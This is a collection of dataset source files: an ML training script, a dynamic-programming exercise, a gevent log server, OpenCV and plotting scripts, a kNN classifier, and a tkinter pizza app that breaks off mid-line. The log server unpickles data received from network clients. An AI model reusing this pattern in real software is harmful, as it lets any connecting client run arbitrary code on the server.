args.percentage_dev\n )\n\n # Instantiate dataloader\n dataset_train = DocumentGraphDataset(\n docs=train_docs,\n labels=train_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_train = dataset_train.to_dataloader(\n batch_size=args.batch_size, shuffle=True, drop_last=True\n )\n\n dataset_dev = DocumentGraphDataset(\n docs=dev_docs,\n labels=dev_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_dev = dataset_dev.to_dataloader(\n batch_size=args.batch_size, shuffle=False, drop_last=False\n )\n\n print(\"Done loading dataset!\")\n\n ######################################\n # Initiate model\n ######################################\n\n if args.pretrained_model is None:\n # Load embeddings\n embeddings = corpus_prepper.load_embeddings(\n f_path=args.path_to_embeddings,\n vocab=word2idx,\n embedding_type=\"word2vec\",\n )\n # Initialize a new model\n learner.init_model(\n args.model_type,\n lr=args.lr,\n n_feat=embeddings.shape[1],\n n_message_passing=args.message_passing_layers,\n n_hid=args.hidden,\n n_penultimate=args.penultimate,\n n_class=n_labels,\n dropout=args.dropout,\n embeddings=embeddings,\n use_master_node=args.use_master_node,\n )\n else:\n # Load pretrained\n learner.load_model(path=args.pretrained_model, lr=args.lr)\n\n ######################################\n # Start training\n ######################################\n\n eval_every = (\n len(dataloader_train)\n if args.eval_every == \"epoch\"\n else int(args.eval_every)\n )\n\n print(\"Start training...\")\n for epoch in range(args.epochs):\n\n learner.train_epoch(dataloader_train, eval_every=eval_every)\n\n learner.evaluate(dataloader_dev)\n\n ######################################\n # Infer Test Set\n ######################################\n if args.do_evaluate:\n\n if args.do_train:\n print(\"Loading best model to infer test set...\")\n learner.load_best_model()\n else: # Load other pretrained model\n assert (\n args.pretrained_model is not None\n ), \"--pretrained-model must be given when --do-train is False and --do-evaluate is True\"\n # print(\"Loading pretrained model for evaluation...\")\n learner.load_model(args.pretrained_model)\n\n ######################################\n # Load dataset\n ######################################\n print(\"Start evaluating on test set...\")\n # Read data\n test_docs, test_labels, n_labels, word2idx = corpus_prepper.load_clean_corpus(\n args.path_to_test_set\n )\n\n dataset_test = DocumentGraphDataset(\n docs=test_docs,\n labels=test_labels,\n word2idx=word2idx,\n **graph_preprocessing_args\n )\n\n dataloader_test = dataset_test.to_dataloader(\n batch_size=args.batch_size, shuffle=False, drop_last=False\n )\n\n learner.evaluate(\n dataloader_test,\n save_model=False\n )\n","sub_path":"mpad/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":5959,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"235508839","text":"# -*- coding: utf-8 -*-\n\"\"\"\nCreated by MengQiu Wang on 2019-05-04\n\"\"\"\n\n\n# 516. Longest Palindromic Subsequence\n# Given a string s, find the longest palindromic subsequence's length in s.\n# You may assume that the maximum length of s is 1000.\n#\n# Example 1:\n# Input:\n#\n# \"bbbab\"\n#\n# Output:\n#\n# 4\n#\n# One possible longest palindromic subsequence is \"bbbb\".\n#\n# Example 2:\n# Input:\n#\n# \"cbbd\"\n#\n# Output:\n#\n# 2\n# idea - dp[i][j]: the longest palindromic subsequence's length of substring(i, j),\n# here i, j represent left, right indexes in the string\n# State transition:\n# dp[i][j] = dp[i+1][j-1] + 2 if s.charAt(i) == s.charAt(j)\n# otherwise, dp[i][j] = Math.max(dp[i+1][j], dp[i][j-1])\n# Initialization: dp[i][i] = 1\n# idea - 相当于把所有区间全部检查了,\ndef longestPalindromeSubseq(s: str) -> int:\n import pdb;\n pdb.set_trace()\n dp = [[0 for _ in range(len(s))] for _ in range(len(s))]\n for i in range(len(s) - 1, -1, -1): # 逆着看\n dp[i][i] = 1\n for j in range(i + 1, len(s)): # 开始位置和结束位置相同会什么都不执行,相当于跳过这步, 从i开始遍历之后的区间\n if s[i] == s[j]:\n\n dp[i][j] = dp[i + 1][j - 1] + 2 # 从斜下角加过来,如果i为0,j为2,这样斜下角为(1,1),如果i=j\n else: # 相当于i,j可以和斜下角组成新的回文,所以斜下角加2,即下标0,1,2组成新的回文\n\n dp[i][j] = max(dp[i + 1][j], dp[i][j - 1]) # 从i,j包括涵盖的区间选最大值,从左和下\n return dp[0][len(s) - 1] # 返回从0到len(s)区间的最大回文\n\n\nif __name__ == \"__main__\":\n longestPalindromeSubseq('cbbd')\n","sub_path":"Basic_Algorithm/DynamicProgramming/longestpalindromicsubsequence.py","file_name":"longestpalindromicsubsequence.py","file_ext":"py","file_size_in_byte":1698,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"421880157","text":"#!/usr/bin/env python3\n# -*- coding:utf-8 -*-\n# !/usr/bin/env python3\n# -*- coding:utf-8 -*-\nimport struct, pickle, gevent\nfrom threading import Thread\nfrom gevent import socket, monkey\n\nmonkey.patch_all()\n\n\nclass JournalServer(object):\n conns = {}\n\n def __init__(self, ip, port, logger, *, listen=500):\n self.ip = ip\n self.port = port\n self.logger = logger\n self.listen = listen\n self.socket = None\n self.isrun = False\n\n def start(self):\n try:\n if not self.socket:\n self.socket = socket.socket()\n self.socket.bind((self.ip, self.port))\n self.socket.listen(self.listen)\n print(\"JournalServer启动成功\")\n if not self.isrun:\n self.isrun = True\n while self.isrun:\n conn, addr = self.socket.accept()\n print(\"新的连接:\", addr)\n JournalServer.conns[conn.fileno()] = conn\n gevent.spawn(self.handle_request, conn, addr)\n\n except KeyboardInterrupt as e:\n self.isrun = False\n print(e)\n\n def stop(self):\n if self.socket:\n self.socket.close()\n self.logger.stop()\n self.isrun = False\n\n def handle_request(self, conn, addr):\n try:\n while self.isrun:\n data_byte = conn.recv(4)\n data_len = struct.unpack(\">L\", data_byte)[0]\n data_byte = conn.recv(data_len)\n data = pickle.loads(data_byte)\n # logger.write(appName, data_byte)\n self.logger.write(addr[0], data)\n\n if not data:\n # print(\"client has been closed...\")\n conn.shutdown(socket.SHUT_RD)\n conn.close()\n JournalServer.conns.pop(conn.fileno())\n else:\n pass\n # print(\"recv:\", data)\n # conn.send(data)\n\n except Exception as ex:\n print(ex)\n print(\"连接断开\", addr)\n finally:\n conn.close()\n if conn.fileno() in JournalServer.conns.keys():\n JournalServer.conns.pop(conn.fileno())\n\n\nclass JournalServerThread(Thread):\n def __init__(self, ip, port, logger, *, listen=500):\n self.journalServer = JournalServer(ip, port, logger, listen=listen)\n Thread.__init__(self)\n\n def run(self):\n self.journalServer.start()\n","sub_path":"journal/JournalServer.py","file_name":"JournalServer.py","file_ext":"py","file_size_in_byte":2541,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"262948615","text":"import cv2\nimport numpy as np\n\n\n# initialize webcam\ncap = cv2.VideoCapture(0)\n\n# define range of HSV values (purple, in this case)\nlower_hsv = np.array([45, 0, 0])\nupper_hsv = np.array([75, 255, 255])\n\nwhile True:\n _, frame = cap.read()\n\n hsv_img = cv2.cvtColor(frame, cv2.COLOR_BGR2HSV)\n\n mask = cv2.inRange(hsv_img, lower_hsv, upper_hsv)\n\n res = cv2.bitwise_and(frame, frame, mask=mask)\n\n cv2.imshow('Original', frame)\n cv2.imshow('Mask', mask)\n cv2.imshow('Filtered Color', res)\n\n if cv2.waitKey(1) == 13: # if Enter key is pressed\n break\n\ncap.release()\ncv2.destroyAllWindows()\n","sub_path":"object_tracking/filtering_by_color.py","file_name":"filtering_by_color.py","file_ext":"py","file_size_in_byte":612,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"410136106","text":"import numpy as np\r\nimport matplotlib.pyplot as plt\r\nfrom uncertainties import ufloat\r\n\r\nimport matplotlib as mpl\r\nmpl.use('pgf')\r\nimport matplotlib.pyplot as plt\r\nmpl.rcParams.update({\r\n'font.family': 'serif',\r\n'text.usetex': True,\r\n'pgf.rcfonts': False,\r\n'pgf.texsystem': 'lualatex',\r\n'pgf.preamble': r'\\usepackage{unicode-math}\\usepackage{siunitx}',\r\n})\r\n\r\nt = np.genfromtxt(\"data/A_times.csv\",delimiter=\",\",unpack=True,usecols=0) #sind in 10^-3 s abgespeichert\r\nU_C = np.genfromtxt(\"data/A_lnU_C.csv\",delimiter=\",\",unpack=True,usecols=0)\r\n\r\nlnUNull=np.log(4.8) #ln(4.8)\r\n\r\nplt.plot(t,U_C,'g*',label=\"Messwerte\")\r\nplt.yscale('log') #logarithmische y-Achse\r\nplt.grid()\r\nplt.legend()\r\nplt.xlabel(r'$t / 10^{-3} \\, \\mathrm{s}$')\r\nplt.ylabel(r'$U_C \\,/\\, \\mathrm{V}$')\r\nplt.savefig(\"plots/plot_messw.pdf\")\r\n\r\nplt.clf()\r\n\r\nparams, covariance_matrix = np.polyfit(t*10**(-3), np.log(U_C), deg=1, cov=True) # mit einer linearen Funktion fitten\r\n\r\nerrors = np.sqrt(np.diag(covariance_matrix)) #Fehler=wurzel der kovarianzmatrix\r\n\r\nfor name, value, error in zip('ab', params, errors):\r\n print(f'{name} = {value:.3f} ± {error:.3f}') # Ausgabe: a und b mit y=a*x + b\r\n\r\nplt.plot(t,U_C,'r*',label=\"Messwerte\")\r\nx_plot = np.linspace(-2.5, -0.25)\r\nplt.plot(x_plot,np.exp(params[0]*x_plot*10**(-3)+params[1]),label=\"Lineare Regression\")\r\nplt.legend(loc=\"best\")\r\nplt.grid()\r\nplt.yscale('log') #logarithmische y-Achse\r\nplt.xlabel(r'$t / 10^{-3} \\mathrm{s}$')\r\nplt.ylabel(r'$U_C \\,/\\, \\mathrm{V}$')\r\nplt.savefig(\"plots/ausgleichsgerade.pdf\")\r\n\r\n# Ausgabe: \r\n# a = -1221.631 ± 18.673\r\n# b = -1.561 ± 0.029\r\n\r\n# Konstante B (vgl. auswertung.text/main.pdf) berechnen mit Unsicherheiten\r\n# B=RC(b - ln U_0)=-1/a (b - ln U_0)\r\na=ufloat(params[0],errors[0]) \r\nb=ufloat(params[1],errors[1])\r\nB=(-1/a)*(b-lnUNull)\r\nprint('B ist ',B.n,'plusminus',B.s)\r\n\r\n#Ausgabe: B ist -0.0025620930329117494 plusminus 4.59548003834578e-05","sub_path":"V353_RC_Kreis/python/plot_A_ausgleichsgerade.py","file_name":"plot_A_ausgleichsgerade.py","file_ext":"py","file_size_in_byte":1906,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"255649168","text":"# 实现一个自己的kNN分类器\r\nimport numpy as np\r\nfrom collections import Counter\r\nfrom matrics import get_accuracy\r\n\r\n\r\nclass KNNClassifier:\r\n\r\n # 初始化KNN分类器\r\n def __init__(self, k):\r\n assert k >= 1, \"k必须为合法值\"\r\n self.k = k\r\n # 以_开头代表私有变量,外界不能访问\r\n self._X_train = None\r\n self._y_train = None\r\n\r\n def fit(self, X_train, y_train):\r\n \"\"\"\r\n 根据训练集训练分类器\r\n :param X_train: 用户传入的训练集特征值\r\n :param y_train: 用户传入的训练集目标值\r\n :return: self自身对象\r\n \"\"\"\r\n assert X_train.shape[0] == y_train.shape[0], \\\r\n \"训练集X必须和y的大小一致\"\r\n assert self.k <= X_train.shape[0], \\\r\n \"训练集X必须至少k个样本\"\r\n\r\n self._X_train = X_train\r\n self._y_train = y_train\r\n return self\r\n\r\n def predict(self, X_predict):\r\n \"\"\"\r\n 预测函数\r\n :param X_predict: 待预测数据集\r\n :return: 对单个向量预测结果的数组\r\n \"\"\"\r\n assert self._X_train is not None and self._y_train is not None, \\\r\n \"在预测前必须先训练\"\r\n assert X_predict.shape[1] == self._X_train.shape[1], \\\r\n \"预测数据的特征数必须和训练集X的一致\"\r\n\r\n y_predict = [self._predict(x) for x in X_predict]\r\n return np.array(y_predict)\r\n\r\n def _predict(self, x):\r\n \"\"\"\r\n 对一个向量进行预测\r\n :param x: 需要预测的单个向量\r\n :return:\r\n \"\"\"\r\n assert x.shape[0] == self._X_train.shape[1], \\\r\n \"预测数据的特征数必须和训练集X的一致\"\r\n distances = [((np.sum((x_train - x) ** 2)) ** 0.5) for x_train in self._X_train]\r\n nearest = np.argsort(distances)\r\n\r\n top_K = [self._y_train[i] for i in nearest[:self.k]]\r\n votes = Counter(top_K)\r\n\r\n return votes.most_common(1)[0][0]\r\n\r\n def score(self, X_test, y_test):\r\n y_predict = self.predict(X_test)\r\n return get_accuracy(y_test, y_predict)\r\n\r\n\r\ndef loadData():\r\n raw_data_X = [[3.3935, 2.3312],\r\n [3.1101, 1.7815],\r\n [1.3438, 3.3684],\r\n [3.5823, 4.6792],\r\n [2.2804, 2.8670],\r\n [7.4234, 4.6965],\r\n [5.7451, 3.5340],\r\n [9.1722, 2.5111],\r\n [7.7928, 3.4241],\r\n [7.9398, 0.7916]]\r\n raw_data_y = [0, 0, 0, 0, 0, 1, 1, 1, 1, 1]\r\n X_train = np.array(raw_data_X)\r\n y_train = np.array(raw_data_y)\r\n return X_train, y_train\r\n\r\n\r\nif __name__ == \"__main__\":\r\n # 获取数据集\r\n X_train, y_train = loadData()\r\n\r\n # 待预测数据\r\n x = [8.0936, 3.3657]\r\n # 将待预测数据转换成数组\r\n X_predict = np.array([x])\r\n\r\n knn_clf = KNNClassifier(k=6)\r\n knn_clf.fit(X_train, y_train)\r\n y_predict = knn_clf.predict(X_predict)\r\n print(y_predict[0])\r\n","sub_path":"机器学习/代码/knn.py","file_name":"knn.py","file_ext":"py","file_size_in_byte":3056,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"66"} +{"seq_id":"234858076","text":"from tkinter import *\r\nfrom datetime import *\r\nfrom tkinter import font\r\nfrom tkinter.font import families\r\nOrderType = str(\"\")\r\nPizzaOrder = [[]for main in range(2)]\r\n\r\ndef RetInfo():\r\n File = open(\"E:/PRG/12PRG/Python Coding/EOY/Menu.txt\" ,\"r\")\r\n FileList1 = ((File.read()).split(\"\\n\")) \r\n FileList2 = []\r\n for main in range(len(FileList1)):\r\n FileList2.append((FileList1[main]).split(\"/\")) \r\n return(FileList2)\r\n\r\ndef CustPage(PizzaData):\r\n global OrderType\r\n\r\n Win1 = Tk()\r\n Win1.geometry(\"360x360\")\r\n Win1.config(bg=\"#fff2cc\")\r\n\r\n PickBut = Button(Win1,text=(\"Pick Up\"),fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(PickFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n DeliBut = Button(Win1,text=(\"Delivery\"),fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(DeliFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n NameBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n AddrBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n PhonBox = Entry(Win1,text=\"\",fg=(\"#000000\"),bg=(\"#cfe2f3\"),font =(\"{Trebuchet MS} 10 italic\"),state=\"disabled\")\r\n ContBut = Button(Win1,text=\"Continue\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(ContFun(PizzaData,NameBox.get(),AddrBox.get(),PhonBox.get(),OrderType)))\r\n ExitBut = Button(Win1,text=\"Exit\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(ExitFun(Win1)))\r\n CleaBut = Button(Win1,text=\"Clear\",fg=(\"#ffffff\"),bg=(\"#6fa8dc\"),font =(\"{Trebuchet MS} 10 italic\"),command=lambda:(CleaFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox)))\r\n\r\n PickBut.pack()\r\n DeliBut.pack()\r\n NameBox.pack()\r\n AddrBox.pack()\r\n PhonBox.pack()\r\n\r\n ContBut.pack()\r\n ExitBut.pack()\r\n CleaBut.pack()\r\n\r\n Win1.mainloop()\r\n return\r\n\r\ndef PickFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"Pick Up\")\r\n PickBut.config(state=\"disabled\")\r\n DeliBut.config(state=\"normal\")\r\n NameBox.config(state=\"normal\")\r\n AddrBox.config(state=\"disabled\")\r\n PhonBox.config(state=\"disabled\")\r\n AddrBox.delete(0,\"end\")\r\n PhonBox.delete(0,\"end\")\r\n return\r\n\r\ndef DeliFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"Delivery\")\r\n PickBut.config(state=\"normal\")\r\n DeliBut.config(state=\"disabled\")\r\n NameBox.config(state=\"normal\")\r\n AddrBox.config(state=\"normal\")\r\n PhonBox.config(state=\"normal\") \r\n return\r\n\r\ndef ContFun(PizzaData,Name,Address,Phone,OrderType):\r\n if ((OrderType) == (\"Pick Up\")):\r\n if Name == \"\":\r\n print(\"Error in Name\")\r\n else:\r\n MenuPage(PizzaData,OrderType)\r\n elif ((OrderType) == (\"Delivery\")):\r\n if Name == \"\":\r\n print(\"Error in Name\")\r\n elif Address == \"\":\r\n print(\"Error in Address\")\r\n elif Phone ==\"\":\r\n print(\"Error in Phone\")\r\n else:\r\n MenuPage(PizzaData,OrderType)\r\n else:\r\n print(\"Error in Order Type\")\r\n return\r\n\r\ndef ExitFun(Win):\r\n Win.destroy()\r\n return\r\n\r\ndef CleaFun(PickBut,DeliBut,NameBox,AddrBox,PhonBox):\r\n global OrderType\r\n OrderType = (\"\")\r\n PickBut.config(state=\"normal\")\r\n DeliBut.config(state=\"normal\")\r\n NameBox.delete(0,\"end\")\r\n AddrBox.delete(0,\"end\")\r\n PhonBox.delete(0,\"end\")\r\n NameBox.config(state=\"disabled\")\r\n AddrBox.config(state=\"disabled\")\r\n PhonBox.config(state=\"disabled\")\r\n\r\n return\r\n\r\ndef MenuPage(PizzaData,OrderType):\r\n global PizzaOrder\r\n \r\n Win2 = Toplevel()\r\n Win2.title(\"Tony's Pizza Menu\")\r\n Win2.geometry(\"360x720\")\r\n Win2.config(bg=\"#fff2cc\")\r\n\r\n TitleText = Label(Win2,text=\"Tony's Pizza\")\r\n SubText1 = Label(Win2,text = \"Standard Pizzas\") \r\n\r\n Pizza1Text = Label(Win2,text = (PizzaData[0][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza2Text = Label(Win2,text = (PizzaData[1][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza3Text = Label(Win2,text = (PizzaData[2][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza4Text = Label(Win2,text = (PizzaData[3][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza5Text = Label(Win2,text = (PizzaData[4][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza6Text = Label(Win2,text = (PizzaData[5][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza7Text = Label(Win2,text = (PizzaData[6][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza8Text = Label(Win2,text = (PizzaData[7][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza9Text = Label(Win2,text = (PizzaData[8][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza10Text = Label(Win2,text = (PizzaData[9][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza11Text = Label(Win2,text = (PizzaData[10][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n Pizza12Text = Label(Win2,text = (PizzaData[11][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n \r\n \r\n\r\n OrderText = Label(Win2,text=(\"Order\"),bg=(\"#cfe2f3\"),fg=(\"#000000\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n OrderText1 = Label(Win2,text=\"\")\r\n OrderText2 = Label(Win2,text=\"\")\r\n OrderText3 = Label(Win2,text=\"\")\r\n OrderText4 = Label(Win2,text=\"\")\r\n OrderText5 = Label(Win2,text=\"\")\r\n OrderBut1 = Button(Win2,text=\"X\",command=lambda:SubFun(0,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut2 = Button(Win2,text=\"X\",command=lambda:SubFun(1,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut3 = Button(Win2,text=\"X\",command=lambda:SubFun(2,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut4 = Button(Win2,text=\"X\",command=lambda:SubFun(3,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n OrderBut5 = Button(Win2,text=\"X\",command=lambda:SubFun(4,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n \r\n Pizza1But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,0,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza2But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,1,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza3But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,2,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza4But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,3,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza5But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,4,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza6But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,5,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza7But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,6,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza8But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,7,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza9But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,8,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza10But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,9,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza11But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,10,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n Pizza12But = Button(Win2,text=(\"View More\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),font=(\"{Trebuchet MS} 10 italic\"),command=lambda:PopOutFun(PizzaData,11,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n\r\n\r\n ExitBut = Button(Win2,text=(\"Exit\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:(ExitFun(Win2)))\r\n OrderBack = Label(Win2,text=(\"\"),bg=(\"#cfe2f3\"))\r\n\r\n TitleText.pack()\r\n SubText1.pack()\r\n\r\n Pizza1Text.pack()\r\n Pizza1But.pack() \r\n Pizza2Text.pack()\r\n Pizza2But.pack() \r\n Pizza3Text.pack()\r\n Pizza3But.pack()\r\n Pizza4Text.pack()\r\n Pizza4But.pack()\r\n Pizza5Text.pack()\r\n Pizza5But.pack()\r\n #Pizza6Text.pack()\r\n #Pizza6But.pack()\r\n #Pizza7Text.pack()\r\n #Pizza7But.pack()\r\n Pizza8Text.pack()\r\n Pizza8But.pack()\r\n Pizza9Text.pack()\r\n Pizza9But.pack()\r\n #Pizza10Text.pack()\r\n #Pizza10But.pack()\r\n #Pizza11Text.pack()\r\n #Pizza11But.pack()\r\n #Pizza12Text.pack()\r\n #Pizza12But.pack()\r\n\r\n ExitBut.pack()\r\n #OrderBack.place(x=40,y=40,height=\"320\",width=\"320\")\r\n OrderText1.pack()\r\n OrderText2.pack()\r\n OrderText3.pack()\r\n OrderText4.pack()\r\n OrderText5.pack()\r\n OrderBut1.pack()\r\n OrderBut2.pack()\r\n OrderBut3.pack()\r\n OrderBut4.pack()\r\n OrderBut5.pack()\r\n return\r\n\r\ndef PopOutFun(PizzaData,PizzaNum,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n \r\n if (PizzaData[PizzaNum][1] == \"8.5\"):\r\n PizzaType = str(\"Standard \")\r\n elif (PizzaData[PizzaNum][1]) == \"13.5\":\r\n PizzaType =str(\"Gorumet\")\r\n\r\n Win3 = Toplevel()\r\n Win3.geometry(\"360x360\")\r\n Win3.config(bg=\"#fff2cc\")\r\n\r\n TitleText = Label(Win3,text=(\"Tony's Pizza\"),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\"))\r\n SubText1 = Label(Win3,text=(PizzaData[PizzaNum][0]),bg=(\"#fff2cc\"),font=(\"{Trebuchet MS} 10 italic\")) \r\n PizzaText1 = Label(Win3,text=(PizzaType),font=(\"{Trebuchet MS} 10 italic\"))\r\n PizzaText2 = Label(Win3,text=(PizzaData[PizzaNum][1]),font=(\"{Trebuchet MS} 10 italic\"))\r\n PizzaInfoText = Label(Win3,text=(PizzaData[PizzaNum][2]))\r\n\r\n AddBut = Button(Win3,text=(\"Add to Order\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:AddFun(len(PizzaOrder[0]),PizzaData,PizzaNum,AddBox.get(),OrderText1,OrderText2,OrderText3,OrderText4,OrderText5))\r\n AddBox = Entry(Win3,bg=(\"#cfe2f3\"),fg=(\"#000000\"))\r\n AddBox.insert(END,1)\r\n Exit = Button(Win3,text=(\"Exit\"),bg=(\"#6fa8dc\"),fg=(\"#ffffff\"),command=lambda:ExitFun(Win3))\r\n\r\n TitleText.pack()\r\n SubText1.pack()\r\n PizzaText1.pack()\r\n PizzaText2.pack()\r\n PizzaInfoText.pack()\r\n AddBox.pack()\r\n AddBut.pack()\r\n Exit.pack()\r\n return\r\n\r\ndef AddFun(PizzaOrderSize,PizzaData,PizzaNum,PizzaQt,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n global PizzaOrder\r\n try:\r\n PizzaQt=int(PizzaQt)\r\n if ((PizzaQt)<=0):\r\n print(\"Error Invalid Qt.\")\r\n elif ((PizzaOrderSize+PizzaQt)>=(6)):\r\n print(\"Error 5 pizza max.\")\r\n else: \r\n PizzaOrder[0].append(PizzaData[PizzaNum][0])\r\n PizzaOrder[1].append(PizzaData[PizzaNum][1])\r\n if(PizzaOrderSize==0):\r\n OrderText1.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==1):\r\n OrderText2.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==2):\r\n OrderText3.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==3):\r\n OrderText4.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n elif(PizzaOrderSize==4):\r\n OrderText5.config(text=((PizzaOrder[0][PizzaOrderSize])+\" \"+(PizzaOrder[1][PizzaOrderSize])))\r\n except ValueError:\r\n print(\"Error Invalid Qt.\")\r\n return\r\n\r\ndef SubFun(OrderPos,PizzaOrder,OrderText1,OrderText2,OrderText3,OrderText4,OrderText5):\r\n if ((len(PizzaOrder[0]))<=0):\r\n print(\"Error No pizzas\")\r\n elif ((len(PizzaOrder[0]))<=(OrderPos)):\r\n print(\"Error No Pizza in order slot\")\r\n else:\r\n PizzaOrder[0].pop(OrderPos)\r\n PizzaOrder[1].pop(OrderPos)\r\n if ((len(PizzaOrder[0]))==0):\r\n OrderText1.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==1):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" \"+(PizzaOrder[1][0])))\r\n OrderText2.config(text=(\"\"))\r\n elif ((len(PizzaOrder[0]))==2):\r\n OrderText1.config(text=((PizzaOrder[0][0])+\" 